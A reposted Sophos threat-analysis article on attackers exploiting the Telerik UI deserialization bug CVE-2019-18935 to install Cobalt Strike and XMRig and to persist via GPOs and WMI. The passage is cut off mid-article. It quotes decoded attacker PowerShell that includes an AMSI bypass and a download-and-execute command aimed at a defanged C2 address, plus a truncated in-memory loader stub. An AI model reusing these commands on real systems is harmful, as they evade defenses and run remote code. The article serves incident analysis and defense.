{"id":19344,"date":"2022-06-15T05:20:56","date_gmt":"2022-06-15T13:20:56","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/06\/15\/news-13077\/"},"modified":"2022-06-15T05:20:56","modified_gmt":"2022-06-15T13:20:56","slug":"news-13077","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/06\/15\/news-13077\/","title":{"rendered":"Telerik UI exploitation leads to cryptominer, Cobalt Strike infections"},"content":{"rendered":"<p><strong>Credit to Author: Matt Wixey| Date: Wed, 15 Jun 2022 11:00:05 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>Using a methodology first seen in 2020, an unknown threat actor has been exploiting a three-year-old bug in the Telerik UI web application framework to take control of web servers, installing Cobalt Strike beacons and other malware in the process.<\/p>\n<p>In the weeks following the initial, 2019 disclosure of the vulnerability, attackers scanned the internet for vulnerable applications. Many server admins were caught off guard by a rapid flurry of attacks that delivered cryptominers. 
But not all the vulnerable servers were hit in the initial wave; the bug was routinely exploited throughout <a href=\"https:\/\/www.cisa.gov\/uscert\/ncas\/alerts\/aa22-117a\">2020 and 2021<\/a> (notably by the <a href=\"https:\/\/www.ic3.gov\/Media\/News\/2020\/200929-2.pdf\">Netwalker ransomware operators<\/a>, who we\u2019ve <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/05\/27\/netwalker-ransomware-tools-give-insight-into-threat-actor\/\">covered<\/a> <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/03\/16\/installing-mtr-on-the-run-to-keep-up-with-netwalker\/\">before<\/a>) &#8211; and the Sophos Managed Threat Response team has intervened in several new attacks since the beginning of May.<\/p>\n<p>In the incidents we investigated, the threat actor exploited the vulnerability (designated <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-18935\">CVE-2019-18935<\/a>) to deliver a Cobalt Strike beacon (in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malware, and established persistence on the servers through some novel methods.<\/p>\n<p>These tactics closely resemble those used in a series of attacks two years ago, attributed at the time to a threat actor dubbed Blue Mockingbird. It\u2019s no secret, of course, that threat actors will often reuse tactics, techniques, and procedures (TTPs) and target known, unpatched vulnerabilities, rather than go to the trouble of developing new approaches.<\/p>\n<p>The attempted execution of PowerShell commands triggered Sophos behavioral-based detection rules, which allowed us to evict the threat actor and prevent the attacks from doing any more damage.<\/p>\n<h3>CVE-2019-18935<\/h3>\n<p>Telerik UI for ASP.NET AJAX is a set of components and themes for building web applications, including a bunch of programmable objects that can manipulate how a web page works or looks. 
Some of those objects can behave like scripts or small programs, and the Telerik management interface gives the site\u2019s developers or managers the ability to upload new modules or other components on demand.<\/p>\n<p>The bug at work here, CVE-2019-18935, is a deserialization vulnerability affecting web applications using Telerik and running on Windows servers \u2013 specifically, in Telerik UI\u2019s <strong>RadAsyncUpload<\/strong> function, used to process file upload requests.<\/p>\n<p>Serialization is when a web application converts complex data structures, like objects, into a stream of bytes, which can then be stored on disk or sent over a network. Deserialization, as the name suggests, involves changing that byte stream back into the original object. But if a web application deserializes data from user input, an attacker can smuggle malicious code into the serialized object, or even replace the object altogether. Possible impacts of deserialization vulnerabilities include denial-of-service, authentication bypasses, and \u2013 as in this case \u2013 remote code execution. As a result, the National Vulnerability Database (NVD) determined that CVE-2019-18935 has a CVSS score of 9.8 (CRITICAL).<\/p>\n<p>The bug is a little more complex than it first appears, though. Serialization within the upload handler in Telerik UI is protected by encryption keys, and an attacker needs to know them before they can exploit the vulnerability. They can abuse earlier bugs in Telerik UI \u2013 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-11317\">CVE-2017-11317<\/a> and <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-11357\">CVE-2017-11357<\/a> \u2013 to do just that, although this requires finding a host that\u2019s still vulnerable. 
Or an attacker could get the keys through some other means \u2013 for example, exploiting another vulnerability in a web application.<\/p>\n<p>Once that\u2019s done, the attacker has to compile a malicious <a href=\"https:\/\/docs.microsoft.com\/en-us\/cpp\/dotnet\/mixed-native-and-managed-assemblies?view=msvc-170\">mixed-mode assembly<\/a> DLL &#8211; containing both managed and unmanaged code \u2013 which, after exploitation, is executed in the context of the <strong>w3wp.exe<\/strong> process, responsible for running web applications on Windows hosts.<\/p>\n<p>So there are a few prerequisites for this exploit chain: finding a vulnerable host; exploiting a five-year-old vulnerability to obtain the encryption keys (or getting them some other way); compiling the right kind of DLL; and then exploiting the deserialization bug. Sounds like a lot of effort!<\/p>\n<p>However, researchers released a <a href=\"https:\/\/github.com\/noperator\/CVE-2019-18935\">public proof-of-concept exploit<\/a> in mid-December 2019, which does most of the heavy lifting. 
It contains code from <a href=\"https:\/\/github.com\/bao7uo\/RAU_crypto\">another repository<\/a> to handle the encryption logic, and a batch file to compile the DLL, making it essentially \u2018point-and-shoot&#8217; (an available <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/http\/telerik_rau_deserialization.rb\">Metasploit module<\/a> makes it even easier).<\/p>\n<p>Telerik <a href=\"https:\/\/docs.telerik.com\/devtools\/aspnet-ajax\/knowledge-base\/common-allows-javascriptserializer-deserialization\">issued a patch<\/a> for the vulnerability, but because the Telerik UI framework is usually embedded into custom-built, one-off web applications, it can be hard for the owners of the servers where those applications are running to figure out whether their unique application is vulnerable to the exploit before they fall victim to an attack.<\/p>\n<h3>Attackers don&#8217;t reinvent the steal<\/h3>\n<p>The attacks observed by Sophos MTR appeared to use the proof-of-concept exploit script referenced above, with a Cobalt Strike beacon DLL used as a payload. 
One of the quirks of this exploit is that, when the attacker uploads the DLL to the server, it always ends up in the <strong>C:\\Windows\\Temp<\/strong> directory on the targeted host, with a Unix timestamp as the filename \u2013 which allows us to find out exactly when the attackers exploited the bug.<\/p>\n<p>The Cobalt Strike payload communicates with a command-and-control server located in the Czech Republic, with the following beacon configuration:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85178\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png\" alt=\"A screenshot of configuration details for the Cobalt Strike beacon\" width=\"1279\" height=\"1200\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png 2637w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png?resize=300,282 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png?resize=768,721 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png?resize=1024,961 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png?resize=1536,1442 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_cs_config.png?resize=2048,1922 2048w\" sizes=\"auto, (max-width: 1279px) 100vw, 1279px\" \/><\/a><\/p>\n<p><em>Figure 1: The Cobalt Strike beacon configuration<\/em><\/p>\n<p>Following execution of the Cobalt Strike payload, the attackers then ran a Base64-encoded PowerShell command, to download and run additional malware from the C2 server.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85179\" 
src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png\" alt=\"A screenshot of decoded PowerShell commands which download and run malware from the attacker's C2 server\" width=\"681\" height=\"719\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png 1759w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png?resize=284,300 284w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png?resize=768,811 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png?resize=970,1024 970w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_decoded_ps.png?resize=1455,1536 1455w\" sizes=\"auto, (max-width: 681px) 100vw, 681px\" \/><\/a><em>Figure 2: The decoded PowerShell commands<\/em><\/p>\n<p>In environments protected by Sophos, the PowerShell execution shown here triggers a behavioural-based detection rule, which terminates the malicious PowerShell process and opens a Sophos MTR case to investigate further.<\/p>\n<p>Our analysis of <strong>setup192.exe<\/strong> reveals that it spawns <strong>cmd.exe<\/strong> for self-injection and drops two further suspicious files \u2013<strong> crby26td.exe<\/strong> and<strong> a.json<\/strong> &#8211; in <strong>C:WindowsTemp<\/strong>.<\/p>\n<p><strong>crby26td.exe<\/strong> is XMRig Miner, a legitimate open-source cryptocurrency miner designed to mine for Monero, and <strong>a.json<\/strong> is a file containing configuration information for cryptomining:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85177\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png\" alt=\"A JSON file with XMRig Miner configuration details\" width=\"912\" height=\"375\" 
srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png 4122w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png?resize=300,123 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png?resize=768,316 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png?resize=1024,421 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png?resize=1536,632 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_config.png?resize=2048,842 2048w\" sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/a><em>Figure 3: The contents of a.json, containing configuration details for the XMRig Miner malware<\/em><\/p>\n<p>The \u2018user\u2019 field above is the Monero wallet ID \u2013 but, due to the design of Monero, we can\u2019t view the balance of the wallet.<\/p>\n<p>Attackers love XMRig Miner, and <a href=\"https:\/\/news.sophos.com\/en-us\/tag\/xmrig\/\">we see it a lot<\/a> \u2013 often in conjunction with widespread vulnerabilities like <a href=\"https:\/\/news.sophos.com\/en-us\/2022\/03\/29\/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers\/\">Log4J<\/a> (CVE-2021-44228).<\/p>\n<h3>Persistence via Group Policy Objects<\/h3>\n<p>A few days later, in an unrelated environment, the Sophos MTR team responded to an incident where a threat actor was performing lateral movement and establishing persistence via Active Directory GPOs.<\/p>\n<p>A GPO is a container for group policy settings, and attackers can leverage <a href=\"https:\/\/attack.mitre.org\/techniques\/T1615\/\">enumeration of GPOs<\/a> \u2013 which are, by default, readable by authenticated domain users \u2013 to identify opportunities for privilege escalation. 
However, GPOs can also be used to establish persistence and complement lateral movement, as in this case.<\/p>\n<p>After further investigation of the network, we identified that attackers had exploited an unprotected web server which was vulnerable to CVE-2019-18935. After gaining initial access, the threat actor pivoted from the compromised web server to unprotected Domain Controllers in order to plant the malicious GPO.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85176\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png\" alt=\"A flowchart showing the attack chain\" width=\"882\" height=\"463\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png 4026w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png?resize=300,157 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png?resize=768,403 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png?resize=1024,537 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png?resize=1536,806 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_attack_chain.png?resize=2048,1075 2048w\" sizes=\"auto, (max-width: 882px) 100vw, 882px\" \/><\/a><\/p>\n<p><em>Figure 4: The attack chain observed by Sophos MTR<\/em><\/p>\n<p>The GPO in question was creating scheduled tasks with unique names, which ran only once, across workstations, resulting in encoded data \u2013 a hex-encoded <strong>cmd.exe<\/strong> command, together with Base64-encoded PowerShell &#8211; being written to the following registry key:<\/p>\n<pre>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{unique_task_name}<\/pre>\n<p><a 
href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85181\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png\" alt=\"A screenshot of encoded malicious data as a scheduled task in the Windows registry\" width=\"702\" height=\"376\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png 2851w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png?resize=300,161 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png?resize=768,412 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png?resize=1024,549 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png?resize=1536,823 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_reg.png?resize=2048,1098 2048w\" sizes=\"auto, (max-width: 702px) 100vw, 702px\" \/><\/a><\/p>\n<p><em>Figure 5: The encoded malicious scheduled task in the registry<\/em><\/p>\n<p>We used a <a 
href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=From_Hex('Auto')Decode_text('UTF-16LE%20(1200)')Strings('Single%20byte',4,'Alphanumeric%20%2B%20punctuation%20(A)',false,false,false)Regular_expression('User%20defined','JAB.*',true,true,false,false,false,false,'List%20matches')From_Base64('A-Za-z0-9%2B\/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&amp;input=MDMgMDAgMGMgMDAgMDAgMDAgNDEgMDAgNzUgMDAgNzQgMDAgNjggMDAgNmYgMDAgNzIgMDAgNjYgNjYgMDAgMDAgMDAgMDAgMGUgMDAgMDAgMDAgNjMgMDAgNmQgMDAgNjQgMDAgMmUgMDAgNjUgMDAgNzggMDAgNjUgMDAgMDggMDUgMDAgMDAgMmYgMDAgNjMgMDAgMjAgMDAgNzAgMDAgNmYgMDAgNzcgMDAgNjUgMDAgNzIgMDAgNzMgMDAgNjggMDAgNjUgMDAgNmMgMDAgNmMgMDAgMmUgMDAgNjUgMDAgNzggMDAgNjUgMDAgMjAgMDAgMmQgMDAgNmUgMDAgNmYgMDAgNzAgMDAgMjAgMDAgMmQgMDAgNzcgMDAgMjAgMDAgNjggMDAgNjkgMDAgNjQgMDAgNjQgMDAgNjUgMDAgNmUgMDAgMjAgMDAgMmQgMDAgNjUgMDAgMjAgMDAgNGEgMDAgNDEgMDAgNDIgMDAgNjggMDAgNDEgMDAgNDQgMDAgMzAgMDAgNDEgMDAgNGEgMDAgNzcgMDAgNDIgMDAgNzQgMDAgNDEgMDAgNDggMDAgNGQgMDAgNDEgMDAgNjEgMDAgNTEgMDAgNDEgMDAgNmUgMDAgNDEgMDAgNDQgMDAgNzMgMDAgNDEgMDAgNTcgMDAgNzcgMDAgNDIgMDAgNTMgMDAgNDEgMDAgNDcgMDAgNTUgMDAgNDEgMDAgNWEgMDAgNjcgMDAgNDIgMDAgNjQgMDAgNDEgMDAgNDMgMDAgMzQgMDAgNDEgMDAgNTEgMDAgNTEgMDAgNDIgMDAgN2EgMDAgNDEgMDAgNDggMDAgNGQgMDAgNDEgMDAgNWEgMDAgNTEgMDAgNDIgMDAgNzQgMDAgNDEgMDAgNDcgMDAgNDkgMDAgNDEgMDAgNjIgMDAgNDEgMDAgNDIgMDAgMzUgMDAgNDEgMDAgNDMgMDAgMzQgMDAgNDEgMDAgNTIgMDAgNzcgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDggMDAgNTEgMDAgNDEgMDAgNTYgMDAgNDEgMDAgNDIgMDAgMzUgMDAgNDEgMDAgNDggMDAgNDEgMDAgNDEgMDAgNWEgMDAgNTEgMDAgNDEgMDAgNmYgMDAgNDEgMDAgNDMgMDAgNjMgMDAgNDEgMDAgNTUgMDAgNzcgMDAgNDIgMDAgMzUgMDAgNDEgMDAgNDggMDAgNGQgMDAgNDEgMDAgNjQgMDAgNDEgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDcgMDAgMzAgMDAgNDEgMDAgNGMgMDAgNjcgMDAgNDIgMDAgNGUgMDAgNDEgMDAgNDcgMDAgNDUgMDAgNDEgMDAgNjIgMDAgNjcgMDAgNDIgMDAgNjggMDAgNDEgMDAgNDcgMDAgNjMgMDAgNDEgMDAgNWEgMDAgNTEgMDAgNDIgMDAgNzQgMDAgNDEgMDAgNDcgMDAgNTUgMDAgNDEgMDAgNjIgMDAgNjcgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDMgMDAgMzQgMDAgNDEgMDAgNTEgMDAgNTEgMDAgNDIgMDAgMzEgMDAgNDEgMDAgNDggMDAgNTEgMDAgNDEgMDAgNjIgMDAgNz
cgMDAgNDIgMDAgNzQgMDAgNDEgMDAgNDcgMDAgNDUgMDAgNDEgMDAgNjQgMDAgNDEgMDAgNDIgMDAgNzAgMDAgNDEgMDAgNDcgMDAgMzggMDAgNDEgMDAgNjIgMDAgNjcgMDAgNDEgMDAgNzUgMDAgNDEgMDAgNDUgMDAgNDUgMDAgNDEgMDAgNGEgMDAgNzcgMDAgNDEgMDAgNzIgMDAgNDEgMDAgNDMgMDAgNTEgMDAgNDEgMDAgNTkgMDAgNTEgMDAgNDEgMDAgNzIgMDAgNDEgMDAgNDMgMDAgNjMgMDAgNDEgMDAgNTYgMDAgNTEgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDcgMDAgNmIgMDAgNDEgMDAgNjIgMDAgNDEgMDAgNDIgMDAgN2EgMDAgNDEgMDAgNDMgMDAgNjMgMDAgNDEgMDAgNGIgMDAgNTEgMDAgNDEgMDAgNzUgMDAgNDEgMDAgNDUgMDAgNjMgMDAgNDEgMDAgNWEgMDAgNTEgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDUgMDAgNTkgMDAgNDEgMDAgNjEgMDAgNTEgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDcgMDAgNzcgMDAgNDEgMDAgNWEgMDAgNDEgMDAgNDEgMDAgNmYgMDAgNDEgMDAgNDMgMDAgNjMgMDAgNDEgMDAgNTkgMDAgNTEgMDAgNDEgMDAgNmUgMDAgNDEgMDAgNDMgMDAgNzMgMDAgNDEgMDAgNGEgMDAgNDEgMDAgNDIgMDAgNjggMDAgNDEgMDAgNDMgMDAgNzMgMDAgNDEgMDAgNGEgMDAgNzcgMDAgNDIgMDAgNGEgMDAgNDEgMDAgNDcgMDAgMzQgMDAgNDEgMDAgNjEgMDAgNTEgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDUgMDAgNTkgMDAgNDEgMDAgNTkgMDAgNTEgMDAgNDIgMDAgNzAgMDAgNDEgMDAgNDcgMDAgNzcgMDAgNDEgMDAgNWEgMDAgNTEgMDAgNDIgMDAgNmIgMDAgNDEgMDAgNDMgMDAgNjMgMDAgNDEgMDAgNGMgMDAgNDEgMDAgNDEgMDAgNmUgMDAgNDEgMDAgNDUgMDAgMzQgMDAgNDEgMDAgNjIgMDAgNzcgMDAgNDIgMDAgNzUgMDAgNDEgMDAgNDYgMDAgNDEgMDAgNDEgMDAgNjQgMDAgNTEgMDAgNDIgMDAgNjkgMDAgNDEgMDAgNDcgMDAgNzcgMDAgNDEgMDAgNjEgMDAgNTEgMDAgNDIgMDAgNmEgMDAgNDEgMDAgNDMgMDAgNzcgMDAgNDEgMDAgNTUgMDAgNzcgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDcgMDAgNDUgMDAgNDEgMDAgNjQgMDAgNDEgMDAgNDIgMDAgNzAgMDAgNDEgMDAgNDcgMDAgNGQgMDAgNDEgMDAgNGEgMDAgNzcgMDAgNDEgMDAgNzAgMDAgNDEgMDAgNDMgMDAgMzQgMDAgNDEgMDAgNTUgMDAgNzcgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDggMDAgNTEgMDAgNDEgMDAgNTYgMDAgNjcgMDAgNDIgMDAgNjggMDAgNDEgMDAgNDcgMDAgNzcgMDAgNDEgMDAgNjQgMDAgNTEgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDMgMDAgNjcgMDAgNDEgMDAgNGEgMDAgNDEgMDAgNDIgMDAgNzUgMDAgNDEgMDAgNDggMDAgNTUgMDAgNDEgMDAgNjIgMDAgNDEgMDAgNDIgMDAgNzMgMDAgNDEgMDAgNDMgMDAgNzcgMDAgNDEgMDAgNGEgMDAgNDEgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDggMDAgNDkgMDAgNDEgMDAgNjQgMDAgNTEgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDMgMDAgNmIgMDAgNDEgMDAgNGYgMDAgNzcgMDAgNDIgMDAgNG
EgMDAgNDEgMDAgNDUgMDAgNTUgMDAgNDEgMDAgNTcgMDAgNDEgMDAgNDEgMDAgNjcgMDAgNDEgMDAgNDMgMDAgNjcgMDAgNDEgMDAgNGIgMDAgNDEgMDAgNDIgMDAgNzUgMDAgNDEgMDAgNDcgMDAgNTUgMDAgNDEgMDAgNjQgMDAgNzcgMDAgNDEgMDAgNzQgMDAgNDEgMDAgNDcgMDAgMzggMDAgNDEgMDAgNTkgMDAgNjcgMDAgNDIgMDAgNzEgMDAgNDEgMDAgNDcgMDAgNTUgMDAgNDEgMDAgNTkgMDAgNzcgMDAgNDIgMDAgMzAgMDAgNDEgMDAgNDMgMDAgNDEgMDAgNDEgMDAgNjIgMDAgNjcgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDggMDAgNTEgMDAgNDEgMDAgNGMgMDAgNjcgMDAgNDIgMDAgMzMgMDAgNDEgMDAgNDcgMDAgNTUgMDAgNDEgMDAgNTkgMDAgNjcgMDAgNDIgMDAgNmEgMDAgNDEgMDAgNDcgMDAgNzcgMDAgNDEgMDAgNjEgMDAgNTEgMDAgNDIgMDAgNmMgMDAgNDEgMDAgNDcgMDAgMzQgMDAgNDEgMDAgNjQgMDAgNDEgMDAgNDEgMDAgNzAgMDAgNDEgMDAgNDMgMDAgMzQgMDAgNDEgMDAgNWEgMDAgNDEgMDAgNDIgMDAgNzYgMDAgNDEgMDAgNDggMDAgNjMgMDAgNDEgMDAgNjIgMDAgNjcgMDAgNDIgMDAgNzMgMDAgNDEgMDAgNDcgMDAgMzggMDAgNDEgMDAgNTkgMDAgNTEgMDAgNDIgMDAgNmIgMDAgNDEgMDAgNDggMDAgNGQgMDAgNDEgMDAgNjQgMDAgNDEgMDAgNDIgMDAgNzkgMDAgNDEgMDAgNDcgMDAgNmIgMDAgNDEgMDAgNjIgMDAgNjcgMDAgNDIgMDAgNmUgMDAgNDEgMDAgNDMgMDAgNjcgMDAgNDEgMDAgNGEgMDAgNzcgMDAgNDIgMDAgNmYgMDAgNDEgMDAgNDggMDAgNTEgMDAgNDEgMDAgNjQgMDAgNDEgMDAgNDIgMDAgNzcgMDAgNDEgMDAgNDQgMDAgNmYgMDAgNDEgMDAgNGMgMDAgNzcgMDAgNDEgMDAgNzYgMDAgNDEgMDAgNDQgMDAgNDkgMDAgNDEgMDAgNGQgMDAgNTEgMDAgNDEgMDAgNzkgMDAgNDEgMDAgNDMgMDAgMzQgMDAgNDEgMDAgNGQgMDAgNTEgMDAgNDEgMDAgMzUgMDAgNDEgMDAgNDQgMDAgNDkgMDAgNDEgMDAgNGMgMDAgNjcgMDAgNDEgMDAgNzkgMDAgNDEgMDAgNDQgMDAgNTEgMDAgNDEgMDAgNGQgMDAgNTEgMDAgNDEgMDAgNzUgMDAgNDEgMDAgNDQgMDAgNDUgMDAgNDEgMDAgNGUgMDAgNTEgMDAgNDEgMDAgMzEgMDAgNDEgMDAgNDQgMDAgNmYgMDAgNDEgMDAgNGYgMDAgNDEgMDAgNDEgMDAgNzcgMDAgNDEgMDAgNDQgMDAgNDEgMDAgNDEgMDAgNGQgMDAgNDEgMDAgNDEgMDAgNzYgMDAgNDEgMDAgNDcgMDAgNDUgMDAgNDEgMDAgNGEgMDAgNzcgMDAgNDEgMDAgNzAgMDAgNDEgMDAgNDMgMDAgNmIgMDAgNDEgMDAgMDAgMDAgMDAgMDAgMDAgMDA\">CyberChef recipe<\/a> to decode this data, resulting in:<\/p>\n<pre>$a='msi';[Ref].Assembly.GetType('System.Management.Automation.A'+$a+'Utils').GetField('a'+$a+'InitFailed',  'NonPublic,Static').SetValue($null,$true);IEX ((new-object 
net.webclient).downloadstring('hxxp:\/\/212.192.241[.]155:8000\/a'))<\/pre>\n<p>This command uses a common <a href=\"https:\/\/www.mdsec.co.uk\/2018\/06\/exploring-powershell-amsi-and-logging-evasion\/\">Antimalware Scan Interface (AMSI) bypass technique<\/a>; note the attacker\u2019s use of string concatenation (the <strong>$a<\/strong> variable) to bypass Windows Defender signatures designed to block this technique.<\/p>\n<p><strong>hxxp[:]\/\/212.192.241[.]155:8000\/a<\/strong> is a remote PowerShell script, this time encoded with gunzip and XOR:<\/p>\n<pre>$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"H4sIAAAAAAAAAOy9Wa\/qSrIu+rzrV8yHLa21xNo1wIAxR9rSNTYY444eTJ1SyRjjBtw3Y  [-truncated-]   q3f94xVr4oD97z0xm85f6tKh+Lyqqi6t93gML5LP4X98EPpf5971L\/3eXp5EPvVTX6eZfVa19rfwJCUODYO2EFAA==\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();<\/pre>\n<p>When decoded (see <a href=\"https:\/\/community.sophos.com\/sophos-labs\/b\/blog\/posts\/decoding-malicious-powershell\">here<\/a> for a primer on decoding malicious PowerShell), the script loads a Cobalt Strike DLL into memory. As in the earlier incidents, XMRig Miner was then downloaded. We also observed an additional binary, <strong>tuh25o6n.exe<\/strong>, being dropped; this downloaded <strong>hxxp[:]\/\/212.192.241[.]155\/up\/setup.exe<\/strong> and, as before, saved it to either <strong>C:\\Windows\\Temp\\setup192.exe<\/strong> or <strong>C:\\Users\\Public\\setup192.exe<\/strong>.<\/p>\n<p>In addition to a scheduled task, the attacker installed a persistent Windows Management Instrumentation (WMI) ActiveScriptEvent consumer named <strong>WindowsUpdate<\/strong>, to download and execute malware from the C2 server at <strong>hxxp[:]\/\/212.192.241[.]155\/up\/setup.exe<\/strong>. 
Threat actors can use <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/wmisdk\/running-a-script-based-on-an-event\">WMI ActiveScriptEvent consumers<\/a> to execute a predefined script upon the triggering of an event, and configure this behavior as either persistent, or a one-off. In this case, it wasn\u2019t clear what the event was, but it may have been the application of GPO settings (Event ID 1500), which from our observations coincided with the creation of malicious tasks.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter wp-image-85182\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png\" alt=\"Screenshot of a malicious WMI ActiveScriptEvent consumer\" width=\"885\" height=\"506\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png 3228w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png?resize=300,172 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png?resize=768,439 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png?resize=1024,586 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png?resize=1536,879 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/06\/telerik_wmi2.png?resize=2048,1172 2048w\" sizes=\"auto, (max-width: 885px) 100vw, 885px\" \/><\/a><\/p>\n<p><em>Figure 6: The malicious WMI ActiveScriptEvent consumer<\/em><\/p>\n<h3>Mocking Blue Mockingbird?<\/h3>\n<p>In May 2020, researchers <a href=\"https:\/\/redcanary.com\/blog\/blue-mockingbird-cryptominer\/\">reported<\/a> that a threat actor dubbed Blue Mockingbird was exploiting CVE-2019-18935 in order to install XMRig Miner and establish persistence using multiple techniques, including scheduled tasks.<\/p>\n<p>So far, so similar. But there are some key differences in the cases we observed. 
